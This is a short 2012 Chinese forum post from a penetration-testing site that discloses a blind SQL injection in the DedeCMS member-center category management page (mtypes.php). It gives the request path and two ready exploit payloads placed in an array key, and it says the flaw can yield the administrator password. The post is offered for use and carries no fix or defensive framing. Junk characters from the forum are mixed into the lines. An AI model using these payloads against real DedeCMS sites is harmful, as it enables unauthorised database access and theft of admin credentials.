中国网络渗透测试联盟
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
[打印本页]
作者:
admin
时间:
2012-12-20 08:08
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊.
1 M3 C# M5 U, }
; F( J! e+ [1 ^' j( f( V
% s+ J5 {! |0 I- D- u5 N! ] P$ W
发生在数组key里的注射漏洞,有点意思.
. v5 b3 `1 n8 i# m/ l& o
0 S' _4 C; G. S( \( q
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
' q) c! s3 h4 K
" I5 a% A2 Q) y. T
http://www.xxx.com
/dede/member/mtypes.php?dopost=save
) ]% H! J, d0 I. t) A9 E# S
2 H8 K+ g$ x/ L. l: `1 \% A
exploit:
# W+ ?: D8 ?0 E; p) M
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
- j2 y$ ?2 q0 r9 [1 J
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
/ i$ {8 T, l3 g; ~. R
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2